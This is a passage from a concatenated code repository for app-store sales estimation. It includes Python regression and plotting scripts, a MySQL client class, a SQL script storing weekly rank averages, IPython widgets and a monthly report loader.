except:
test1['t1e'] = list(np.exp(fitted_ra1.predict(test1[['r1_log', 'r1_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']])))
test_out1.append(test1)
test_out1 = pd.concat(test_out1)
except:
test_out1 = df_obs[df_obs['date'] == date]
test_out1['t1e'] = np.nan
test_out1['t1e'] = test_out1['t1e'].astype(float)
pass
#print('ipad_only')
test_out2 = []
try:
model_ra2 = sm.OLS.from_formula(formula ='actual_log ~ r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == True) & (np.isnan(df_obs['r2_log']) == False) & (np.isnan(df_obs['actual_log']) == False) & (np.isnan(df_obs['has_event_flag']) == True)))
fitted_ra2 = model_ra2.fit()
for tr, te in kf:
train = df_obs[df_obs['app_id'].isin(app_ids.loc[tr]['app_id'])]
test = df_obs[df_obs['app_id'].isin(app_ids.loc[te]['app_id'])]
#train = df_obs.loc[tr]
#test = df_obs.loc[te]
test2 = test.dropna(subset = ['r2_log'])
test2 = test2[test2['date'] == date]
try:
model_r2 = sm.OLS.from_formula(formula ='actual_log ~ r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == True) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual_log']) == False) & (np.isnan(df_obs['has_event_flag']) == True)))
fitted_r2 = model_r2.fit()
test2['t2e'] = np.exp(fitted_r2.predict(test2[['r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
test2['t2e'] = np.exp(fitted_ra2.predict(test2[['r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_out2.append(test2)
test_out2 = pd.concat(test_out2)
except:
test_out2 = df_obs[df_obs['date'] == date]
test_out2['t2e'] = np.nan
test_out2['t2e'] = test_out2['t2e'].astype(float)
pass
#print('universal')
test_outa = []
try:
model_raa = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == False) & (np.isnan(df_obs['r2_log']) == False) & (np.isnan(df_obs['actual_log']) == False) & (np.isnan(df_obs['has_event_flag']) == True)))
fitted_raa = model_raa.fit()
for tr, te in kf:
train = df_obs[df_obs['app_id'].isin(app_ids.loc[tr]['app_id'])]
test = df_obs[df_obs['app_id'].isin(app_ids.loc[te]['app_id'])]
#train = df_obs.loc[tr]
#test = df_obs.loc[te]
testa = test.dropna(subset = ['r2_log', 'r1_log'])
testa = testa[testa['date'] == date]
try:
model_ra = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == True) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual_log']) == False) & (np.isnan(df_obs['has_event_flag']) == True)))
fitted_ra = model_ra.fit()
testa['tae'] = np.exp(fitted_ra.predict(testa[['r1_log', 'r1_inv', 'r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
testa['tae'] = np.exp(fitted_raa.predict(testa[['r1_log', 'r1_inv', 'r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_outa.append(testa)
test_outa = pd.concat(test_outa)
test_outa = test_outa[test_outa['date'] == date]
except:
test_outa = df_obs[df_obs['date'] == date]
test_outa['tae'] = np.nan
test_outa['tae'] = test_outa['tae'].astype(float)
pass
#print test_out1.columns
test_out1 = test_out1[['app_id', 'category_id', 'date', 'feed_id', 't1e']]
test_out2 = test_out2[['app_id', 'category_id', 'date', 'feed_id', 't2e']]
test_outa = test_outa[['app_id', 'category_id', 'date', 'feed_id', 'tae']]
result = df_obs[df_obs['date'] == date]
result['nb_obs'] = df_obs['actual'].dropna().shape[0]
result = result.merge(test_out1, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
result = result.merge(test_out2, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
result = result.merge(test_outa, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
gres.append(result)
if (gres == []):
return pd.DataFrame()
gres = pd.concat(gres)
gres['tae'] = gres['tae'].where(np.isnan(gres['tae']) == False, gres['t1e'])
gres['tae'] = gres['tae'].where(np.isnan(gres['tae']) == False, gres['t2e'])
#print gres.dtypes()
gres.to_csv('res_stg_%s_v8.csv'%store_id, index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres
def gene_final(df):
gres_final = df.groupby(['store_id', 'date', 'app_id', 'feed_id']).mean().reset_index()
gres_final['sbe_rel_error'] = (gres_final['iphone_estimate'] + gres_final['ipad_estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
#gres_final['t12e_rel_error'] = (gres_final['t1e+t2e'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final.to_csv('res_%s_v8.csv'%store_id,index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres_final
def gene_final_byscore(df):
#actuals_df = df[['store_id', 'date', 'feed_id', 'app_id', 'actual']].drop_duplicates()
gres_final = df.groupby(['store_id', 'date', 'app_id', 'feed_id']).mean().reset_index()
df['loginv_abs_error'] = (df['tae'] - df['actual']).abs()
df['loginv_rel_error'] = df['loginv_abs_error'] / df['actual']
df['score'] = 0.0
df['score'][np.isnan(df['iphone_rank'])==False] = 1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)
df['score'][np.isnan(df['ipad_rank'])==False] = 1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)
df['score'][(np.isnan(df['iphone_rank'])==False) &
(np.isnan(df['ipad_rank'])==False)] = ((1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)) + (1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)))/2.0
#scores = df.groupby(['store_id', 'feed_id', 'category_id']).sum().reset_index()
#scores = scores[['store_id', 'feed_id', 'category_id', 'score']]
#del df['score']
#loginv_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).mean().reset_index()
#loginv_sbe_df.rename(columns={'loginv_estimate':'loginv_sbe_estimate'}, inplace=True)
#del loginv_sbe_df['actual']
#loginv_sbe_df = loginv_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
#loginv_sbe_df['loginv_sbe_abs_error'] = (loginv_sbe_df['loginv_sbe_estimate'] - loginv_sbe_df['actual']).abs()
#loginv_sbe_df['loginv_sbe_rel_error'] = loginv_sbe_df['loginv_sbe_abs_error'] / loginv_sbe_df['actual']
#df = df[df['date']==df['date'].min()]
#loginv_scored_sbe_df = df.drop_duplicates(cols=['store_id', 'date', 'category_id', 'feed_id', 'app_id'])
#loginv_scored_sbe_df = loginv_scored_sbe_df.merge(scores, on=['store_id', 'feed_id', 'category_id'])
df['tae_scored'] = df['tae'] * df['score']
loginv_scored_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).sum().reset_index()
loginv_scored_sbe_df['tae_scored'] /= loginv_scored_sbe_df['score']
loginv_scored_sbe_df.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
#loginv_scored_sbe_df.rename(columns={'loginv_scored_estimate':'loginv_scored_sbe_estimate'}, inplace=True)
#del loginv_scored_sbe_df['actual']
#loginv_scored_sbe_df = loginv_scored_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
#loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] = (loginv_scored_sbe_df['loginv_scored_sbe_estimate'] - loginv_scored_sbe_df['actual']).abs()
#loginv_scored_sbe_df['loginv_scored_sbe_rel_error'] = loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] / loginv_scored_sbe_df['actual']
loginv_scored_sbe_df = loginv_scored_sbe_df[['store_id', 'date', 'feed_id', 'app_id', 'tae_scored', 'score']]
gres_final = pd.merge(gres_final, loginv_scored_sbe_df, on=['store_id', 'date', 'feed_id', 'app_id'])
gres_final['sbe_rel_error'] = (gres_final['iphone_estimate'] + gres_final['ipad_estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_scored_rel_error'] = (gres_final['tae_scored'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
gres_final.to_csv('res_%s_v8.csv'%store_id,index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres_final
def plot_rank_error(df):
df = df.merge(df, on=['Store', 'Day', 'App.ID'], how='left')
df = df[df['Category_x'] ==36]
#gres_iphone = gres[(gres['Rank_x_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['new_rel_error'] < 5)]
gres_iphone = df[(df['Rank_x_x'] > 0) & (df) & (df['t12e_rel_error'] < 5)]
gres_iphone = gres_iphone.sort('Rank_x_x', ascending=True)
for n, g in gres_iphone.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_x_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
ax.scatter(g['Rank_x_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmted SBE')
ax.legend(loc='best')
title = 'Relative Error iPhone Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 1000)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
gres_ipad = gres[(gres['Rank_y_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['t12e_rel_error'] < 5)]
gres_ipad = gres_ipad.sort('Rank_y_x', ascending=True)
for n, g in gres_ipad.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_y_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
ax.scatter(g['Rank_y_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmted SBE')
ax.legend(loc='best')
title = 'Relative Error iPad Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 400)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
def plot_8020(df):
for n, g in df.groupby(['feed_id', 'date']):
date = str(n[1])
feed = int(float(n[0]))
fig = plt.figure()
g = g.sort('actual', ascending=False)
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv')
g = g.sort('tae_scored_rel_error', ascending=True)
p1, = ax.plot(g['tae_scored_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv Scored')
ax.legend(loc=4)
if (feed == 0):
title = '80-20 %s %s Free All Apps'%(store_id, date)
if (feed == 1):
title = '80-20 %s %s Paid All Apps'%(store_id, date)
if (feed == 2):
title = '80-20 %s %s Grossing All Apps'%(store_id, date)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
print title
fig.savefig('LogInv2_Daily_Plots/%s.png'%title)
plt.close()
fig = plt.figure()
g = g.sort('actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv')
g = g.sort('tae_scored_rel_error', ascending=True)
p1, = ax.plot(g['tae_scored_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv Scored')
ax.legend(loc=4)
if (feed == 0):
title = '80-20 %s %s Free Top200 Apps'%(store_id, date)
if (feed == 1):
title = '80-20 %s %s Paid Top200 Apps'%(store_id, date)
if (feed == 2):
title = '80-20 %s %s Grossing Top200 Apps'%(store_id, date)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
print title
fig.savefig('LogInv2_Daily_Plots/%s.png'%title)
plt.close()
def plot_act_err(df):
for n, g in df.groupby(['feed_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(g['actual'], g['actual'], color='black', label='Actual')
ax.plot(g['actual'], (g['Daily.Estimate']), 'r.', alpha=0.4, label='SBE')
ax.plot(g['actual'], (g['tae']), 'b.', alpha=0.4, label='LogInv Univ')
ax.legend(loc='best')
title = 'ActEst %s %s %s'%(store_id, str(int(float(n[0]))), str(n[1]) )
plt.title(title)
plt.ylabel('Estimates')
plt.xlabel('Actual')
plt.grid()
ax.set_yscale('log')
ax.set_xscale('log')
#fig.savefig('%s.png'%title)
fig.savefig('LogInv2_Daily_Plots/%s.png'%title)
print title
#plt.close()
def main():
global df_obs
global df_final
global store_id
#data_dir = '/Users/antony/workspace/data/benchmark_daily'
data_dir = '/home/antony/data/benchmark'
start_date = '2013-07-21'
end_date = '2013-07-27'
filelist= []
store_ids = set()
for root, dirs, files in os.walk(data_dir):
for file in files:
#if file.endswith(".csv.bz2") and '143441' in file:
if file.endswith(".csv.bz2"):
filepath = os.path.join(root, file)
filelist.append(file)
store_ids.add(file.split('_')[2])
#store_ids.clear()
#store_ids.add('143441')
for i in list(store_ids):
store_id = i
print '======== country',store_id
sdf = []
for file in files:
if file.endswith(".csv.bz2") and i in file:
filepath = os.path.join(root, file)
print filepath
dfbz = bz2.BZ2File(filepath, 'r')
pdf = pd.read_csv(dfbz)
sdf.append(pdf)
sdf = pd.concat(sdf)
df_obs = preprocess_metadata(sdf)
del sdf
df_reg = regression(df_obs, start_date, end_date)
del df_obs
if(df_reg.shape[0]==0):
continue
#df_final = gene_final(df_reg)
df_final = gene_final_byscore(df_reg)
del df_reg
df_plot = df_final.dropna(subset = ['actual'])
del df_final
# the following code build the overall_rank-error curve
if False:
plot_rank_error(df_plot)
# the following code build the 80-20 curve
if False:
plot_8020(df_plot)
# the following code build the Actual-Error curve
if False:
plot_act_err(df_plot)
del df_plot
print '======== Done',store_id
pass
if __name__ == '__main__':
main()<file_sep>/tooling/DistimoClients/distimo_clients/example_settings.ini
[MYSQL]
host = mm3
user = joep
password = <PASSWORD>
port = 3306
db =
[MoneyMaker]
host = report1
user = user
password = <PASSWORD>
port = 22
# Fill in user name and password, delete this line and rename this file to settings.ini.
<file_sep>/aa_au_model/audience/audience/paths.py
import os
def model(modality, source_platform, target_platform, target_country, classes, out_folder='out/'):
"""
Return path to model.
"""
sub_folder = '_'.join((modality, source_platform, target_platform, target_country.lower()))
file_name = '_'.join([modality, target_platform] + classes) + '.pickle'
model_path = os.path.join(out_folder, sub_folder, 'model', file_name)
return model_path<file_sep>/int-vs-m-benchmark/sql/android/1001i1-store_weekly_averages.sql
/*
Store the weekly averages in JSON format.
*/
-- Increase group concat to be able to concat the JSON strings
SET SESSION group_concat_max_len = 100000;
-- Prepare the rank data.
DROP TEMPORARY TABLE IF EXISTS temp.rank_data_temp;
CREATE TEMPORARY TABLE temp.rank_data_temp(
store_id INT not null,
category_id INT not null,
feed INT not null,
start_date DATE NOT NULL,
end_date DATE NOT NULL,
data LONGTEXT,
CONSTRAINT PRIMARY KEY (store_id,category_id,feed,start_date,end_date))
select
x.store_id,
x.appannie_category_id as category_id,
x.feed,
date_sub(@date, interval 6 day) as start_date,
@date as end_date,
CONCAT('{', GROUP_CONCAT(rank_value_string order by rank separator ','), '}') as data
from
(
SELECT
cnm.store_id,
cgm.appannie_category_id,
fdtm.feed,
CONCAT('"', wra.rank, '"', ':', wra.average) AS rank_value_string,
wra.rank
FROM
temp.weekly_rank_averages wra
JOIN aa_benchmarking_android.feed_device_type_mappings fdtm
USING (type)
JOIN aa_benchmarking_android.country_mappings cnm
USING (country_id)
JOIN aa_benchmarking_android.category_mappings cgm
ON wra.category_id = cgm.distimo_category_id
) x
group by
x.store_id,
x.appannie_category_id,
x.feed;
-- Remove values already present for generated stores and days.
delete
r.*
from
aa_benchmarking_android.rank_data r
join temp.rank_data_temp t
using(store_id, start_date);
-- Insert new values.
insert into aa_benchmarking_android.rank_data
select
t.store_id,
t.category_id,
t.feed,
t.start_date,
t.end_date,
t.data
from
temp.rank_data_temp t;<file_sep>/tooling/DistimoClients/distimo_clients/mysqldb.py
import configparser
import inspect
import glob
import mysql.connector
import numpy as np
import os
import re
from natsort import natsort # note use naturalsort 1.0.3
from pandas import DataFrame
import types
class Client:
def __init__(self, host="", user="", password="", port="", db=""):
"""
Loads database settings and creates connection. File settings.ini or
clients/settings.ini is read if no parameters are given.
"""
if host is None or host is "":
# Parse settings.ini or /clients/settings.ini.
config = configparser.ConfigParser()
config.read('settings.ini')
if "MYSQL" not in config.keys():
path_to_class = os.path.dirname(inspect.getfile(self.__class__))
settings_path = (path_to_class + os.sep + 'settings.ini')
config.read(settings_path)
try:
self.host = config['MYSQL']['host']
self.user = config['MYSQL']['user']
self.password = config['MYSQL']['password']
self.port = config['MYSQL']['port']
self.db = config['MYSQL']['db']
except KeyError:
print('Error loading settings.ini file(s).')
raise
else:
# Unpack arguments.
self.host = host
self.user = user
self.password = <PASSWORD>
self.port = port
self.db = db
self.cursor = None
self.connector = None
self.create_connection()
def __del__(self):
self.destroy_connection()
def __invoker(self, func):
return func()
def __cursor_execute_and_commit(self,sql_statement,multi=False):
"""
Cursor executes statement with commit if successful else rollback.
"""
result = None
try:
if multi:
result = self.cursor.execute(sql_statement, multi=multi)
self.connector.commit()
else:
self.cursor.execute(sql_statement)
if self.connector.unread_result:
result = self.cursor.fetchall()
self.connector.commit()
return result
except mysql.connector.Error as err:
if not self.connector.unread_result:
self.connector.rollback()
raise
def create_connection(self):
"""
Creates a cursor to the database.
"""
if self.db == '':
self.connector = mysql.connector.connect(user=self.user,
password=self.<PASSWORD>,
host=self.host,
port=self.port)
else:
self.connector = mysql.connector.connect(user=self.user,
password=<PASSWORD>,
host=self.host,
port=self.port, db=self.db)
self.cursor = self.connector.cursor()
def destroy_connection(self):
""""
Closes the connection.
"""
if self.cursor is not None:
self.cursor.close()
if self.connector is not None:
self.connector.close()
def execute(self, sql_statement, store_output=True,
print_statement=True):
"""
Executes a SQL statement.
"""
query_result = self.__cursor_execute_and_commit(sql_statement)
if query_result is not None:
if print_statement:
print("Statement had {} row(s) as result".format(len(query_result)))
columns_names = zip(*self.cursor.description)[0]
if not query_result:
result = DataFrame(columns=columns_names)
else:
result = DataFrame(query_result, columns=columns_names)
else:
result = query_result
if store_output:
return result
def execute_multi(self, sql_statement, store_output=True,
print_statements=True):
"""
Executes multiple SQL results.
"""
results = self.__cursor_execute_and_commit(sql_statement, multi=True)
result_array = []
if results is not None:
for result in results:
if result.with_rows:
query_result = result.fetchall()
if print_statements:
print("Statement '%s' had %i row(s) as result \n" %
(result.statement, len(query_result)))
columns_names = zip(*result.description)[0]
result_array.append(DataFrame(query_result,
columns=columns_names))
else:
if print_statements:
print("Statement '%s' affected %i row(s) \n" %
(result.statement, result.rowcount))
if store_output:
return result_array
def execute_files(self, sql_file_path, store_output=True,
print_statements=True):
"""
Executes SQL files given by glob pattern.
"""
files = glob.glob(sql_file_path)
# natural order sorting
files = natsort(files)
if len(files) == 0:
print("\nNo files found!\n")
return None
result_array = []
for current_file in files:
sql_file = open(current_file, 'r')
sql_text = sql_file.read()
# Remove single line comments and non greedy filter out block
# comments.
line_comment_filter = re.compile("--.*")
block_comment_filter = re.compile("\/\*.*?\*\/", re.DOTALL)
sql_text = block_comment_filter.sub('', sql_text)
sql_text = line_comment_filter.sub('', sql_text)
search_set_delim = re.search('(delimiter\s*)(\S+)\s*', sql_text,
re.IGNORECASE)
if search_set_delim:
new_delim = re.escape(search_set_delim.group(2))
set_delim = search_set_delim.group(1) + new_delim + ".*"
set_delimiter_filter = re.compile(set_delim, re.IGNORECASE)
sql_text = set_delimiter_filter.sub('', sql_text)
new_delim_filter = re.compile(new_delim)
sql_text = new_delim_filter.sub(';', sql_text)
default_delim_filter = re.compile("delimiter\s*;\s*")
sql_text = default_delim_filter.sub('', sql_text)
# Two step filtering out empty sql statements
sql_text = re.sub('(;\\s*;)', ';', sql_text)
sql_text = re.sub('(;\\s*;)', ';', sql_text)
results = self.__cursor_execute_and_commit(sql_text, multi=True)
if print_statements:
print("Executing: '{}'\n".format(current_file))
if results is not None:
for result in results:
if result.with_rows:
query_result = result.fetchall()
if print_statements:
print("Statement '%s' had %i row(s) as result \n" %
(result.statement, len(query_result)))
if store_output:
columns_names = zip(*result.description)[0]
if len(query_result) < 1:
query_result = np.empty((1, len(columns_names)))
query_result[:] = np.nan
result_array.append(DataFrame(query_result,
columns=columns_names))
else:
if print_statements:
print("Statement '%s' affected %i row(s) \n" %
(result.statement, result.rowcount))
if store_output:
return result_array
def execute_file_list(self, sql_file_list, store_output=True,
print_statements=True):
"""
Executes a list of SQL files.
"""
result_array = []
for sql_file in sql_file_list:
result_array.append(self.execute_files(sql_file, store_output,
print_statements))
if store_output:
return result_array
def set_variables(self, variable_dictionary):
"""
Sets multiple variables in the current session.
Example:
db.set_variables({'start_date': '20131201', 'iso_code': 'NL'})
--> @start_date = '20131201';
--> @iso_code = 'NL';
"""
statements = ''
for name in variable_dictionary:
statements += "set @{} = '{}';".format(name, variable_dictionary[name])
if statements:
self.execute_multi(statements, store_output=False, print_statements=False)
else:
print "Variable dictionary was empty; no variables were set"
def get_tables(self, table_names, print_statements=True):
"""
Returns the contents of tables in a dictionary.
Params:
@table_names: List with names of tables to retrieve (use the
absolute path).
"""
result = {}
for table in table_names:
sql_statement = "select * from {};".format(table)
result[table] = self.execute(sql_statement,
print_statement=print_statements)
return result
def use_database(self, database, print_statement=True):
"""
Sets database to use.
Params:
- @database: Database name (e.g. 'appstore' or 'market').
"""
sql_statement = "use {};".format(database)
self.execute(sql_statement, print_statement=print_statement)
<file_sep>/financial-product-benchmark/single-model/lib/my_classes.py
from IPython.html import widgets
from IPython.display import display, clear_output
from collections import OrderedDict
class FunctionController(object):
def __init__(self, data, sel_cols, func, **func_kwargs):
self.data = data
self.sel_cols = sel_cols
self.func = func
self.func_kwargs = func_kwargs
self.sel = None
self.sel_data = None
self.updating_all_lists = False
self.container = widgets.ContainerWidget()
self.create_dropdowns()
self.change_handler()
def _ipython_display_(self):
"""
Called when display() or pyout is used to display the GUI.
"""
self.container._ipython_display_()
def create_dropdowns(self):
children = []
for column in self.sel_cols:
dropdown = Dropdown()
dropdown.on_trait_change(self.change_handler, 'value')
children.append(dropdown)
self.container.children = children
self.container._css = {'': {'width': '100%', 'flex-direction': 'row',
'justify-content': 'center', 'align-items': 'center',
'margin-bottom': '5px'},
'.widget-hbox-single': {'margin': '5px'}}
def change_handler(self, name='', old='', new=''):
if not self.updating_all_lists:
self.updating_all_lists = True
self.populate_dropdowns()
self.execute_function()
self.updating_all_lists = False
def populate_dropdowns(self):
data_sel = self.data[self.sel_cols[0]] == self.data[self.sel_cols[0]]
for i, column in enumerate(self.sel_cols):
unique_data_str = self.data.ix[data_sel, column].unique().astype(str)
unique_data = self.data.ix[data_sel, column].unique()
self.container.children[i].values = OrderedDict(zip(unique_data_str, unique_data))
data_sel &= (self.data.ix[data_sel, column] == self.container.children[i].value)
self.sel = data_sel
def execute_function(self):
self.sel_data = self.data[self.sel]
self.func(self, self.sel_data, self.sel_cols, **self.func_kwargs)
class Dropdown(widgets.DropdownWidget):
"""
DropDown custom widget
"""
def __init__(self, **kwargs):
super(Dropdown, self).__init__(**kwargs)
self._css = {'.btn-group>.btn:first-child': {'width': '100px'},
'.dropdown-menu': {'max-height': '140px', 'width': '115px',
'overflow-y': 'scroll',
'overflow-x': 'hidden'}}<file_sep>/top-app-stability/README.md
top-app-stability
=================
This directory contains the investigation into the stability of top app estimates, comparing App Annie's estimates with that of Distimo. This investigation was performed for gaining more insight into the best method for restructuring/improving App Annie's estimation algorithm reusing parts of Distimo's algorithm.
This analysis is peformed on estimates in the period 2014-03-01 till 2014-10-01.<file_sep>/product_quality/load_reports.py
'''
Created on Apr 16, 2013
@author: perezrafael
'''
import pandas as pd
import sys
import os
import zipfile
import StringIO
import commands
import calendar
from internal import utilities_pandas
from internal import config
from internal import utilities
def _check_args():
if len(sys.argv) - 1 != 5:
raise Exception("Wrong number of arguments.")
input_dir = sys.argv[1]
if not (os.path.exists(input_dir)):
raise Exception("Please make sure that both input dir exists")
def _fetch_from_reports(input_dir, month, country_id, platform):
for file in os.listdir(input_dir):
if file.endswith("%s_%s.zip"%(platform, month)):
fullpath = os.path.join(input_dir, file)
country_name = ''
if platform =='ios':
platform = 'iOS'
#country_names = [ config.IOS_STORES_DICT[k].replace(' ', '_') for k in country_ids ]
country_name = config.IOS_STORES_DICT[country_id].replace(' ', '_')
elif platform =='android':
platform = 'Android'
#country_names = [ config.ANDROID_STORES_DICT[k].replace(' ', '_') for k in country_ids ]
country_name = config.ANDROID_STORES_DICT[country_id].replace(' ', '_')
filehandle = open(fullpath, 'rb')
zfile = zipfile.ZipFile(filehandle)
for file in zfile.namelist():
if 'App_Annie_Intelligence_Top_Apps_Report_%s_%s_'%(platform, month) in file and '.csv' in file and country_name in file:
data = StringIO.StringIO(zfile.read(file))
df = pd.read_csv(data)
break
df.rename(columns={'Rank':'rank',
'Category':'category_id',
'App ID':'app_id',
'App Estimate':'estimate',
'Country':'store_id',
'Unit':'unit',
'Period':'period'}, inplace=True)
return df
def _calculate_sbe(df):
df = df[['app_id', 'Market', 'Type', 'estimate']]
sbe = df.groupby(['app_id', 'Market', 'Type']).mean().reset_index()
sbe = sbe.groupby(['app_id']).sum().reset_index()
sbe.rename(columns={'estimate':'sbe'}, inplace=True)
return sbe
def _fetch_from_db(platform, store, unit, dtstart, dtend, db_info):
if platform =='ios':
table = 'aa_staging'
column = 'app_id'
elif platform == 'android':
table = 'aa_staging_android'
column = 'app_class'
common_suffix = 'WHERE d.store_id=%s ' % store + \
'AND d.date >= DATE(\'%s\') ' % dtstart + \
'AND d.date <= DATE(\'%s\'))' % dtend
if unit == 'Downloads':
cmd = 'echo "COPY (SELECT date, ' + column + ', units FROM downloads d ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U aa -h nile ' + table
elif unit == 'USD':
cmd = 'echo "COPY (SELECT date, ' + column + ', revenue FROM sales d ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U aa -h nile ' + table
else:
raise Exception('Unit types should be Downloads or USD')
status, stdout = commands.getstatusoutput(cmd)
if status is None or status >= 2:
raise Exception("Have problem fetching daily estimation: %s" % cmd)
return utilities_pandas.convert_str_to_df(stdout)
def _get_full_period_app_actuals (df):
size = df.groupby('app_id').size().reset_index()
max = size[0].max()
size = size[size[0]==max][['app_id']]
return size
def get_monthly_values(input_dir, month, country_id, platform, unit, filter):
report = _fetch_from_reports(input_dir, month, country_id, platform)
report = report[report['unit']==unit]
sbe = _calculate_sbe(report)
dtstart = '%s-01'%month
dtend = '%s-%s'%(month,calendar.monthrange(int(month.split('-')[0]),int(month.split('-')[1]))[1])
actuals = utilities._fetch_from_db(platform, country_id, unit, dtstart, dtend)
if platform == 'android':
actuals.rename(columns={'app_class':'app_id'}, inplace=True)
if filter:
full_period_apps = _get_full_period_app_actuals(actuals)
actuals = actuals.merge(full_period_apps, on='app_id', how='inner')
if unit =='USD':
actuals.rename(columns={'revenue':'units'}, inplace=True)
actuals = actuals[['app_id', 'units']].groupby('app_id').sum().reset_index()
sbe = sbe.merge(actuals, on='app_id', how='inner')
return sbe
def main():
_check_args()
input_dir = sys.argv[1]
month = sys.argv[2]
platform = sys.argv[3]
unit = sys.argv[4]
filter = sys.argv[5]
if filter == 'filter':
filter = True
out_dir = './data/filtered_full-period_monthly'
else:
filter = False
out_dir = './data/original_monthly'
if not os.path.exists(out_dir):
os.makedirs(out_dir)
if platform =='ios':
country_ids = [143441,143465,143466,143462,143444]
else:
country_ids =[10,7,9,27,3]
first_pass = True
for country_id in country_ids:
if first_pass:
try:
result = get_monthly_values(input_dir, month, country_id, platform, unit, filter)
result['store_id'] = country_id
first_pass=False
except:
first_pass=True
else:
try:
rb = get_monthly_values(input_dir, month, country_id, platform, unit, filter)
rb['store_id'] = country_id
result = pd.concat([result,rb])
except:
pass
result.to_csv('%s/Monthly_%s_%s_%s.csv'%(out_dir,month, platform, unit), index=False)
if __name__ == '__main__':
main()
<file_sep>/exact-matching-improvement/icon_lib/compute_metrics.py
__author__ = 'srhmtonk'
import pandas as pd
import numpy as np
from os import urandom
import Levenshtein as Le
import sklearn.metrics as me
import matplotlib.pylab as plt
COLS = {
'colors': [['avg_r_1', 'avg_b_1', 'avg_g_1'], ['avg_r_2', 'avg_b_2', 'avg_g_2']],
'color_distance': 'color_distance',
'hashes': ['hash_1', 'hash_2'],
'hamming': 'hamming',
'label': 'label',
'result': 'result'
}
def rand_hex_string(n_bytes):
"""
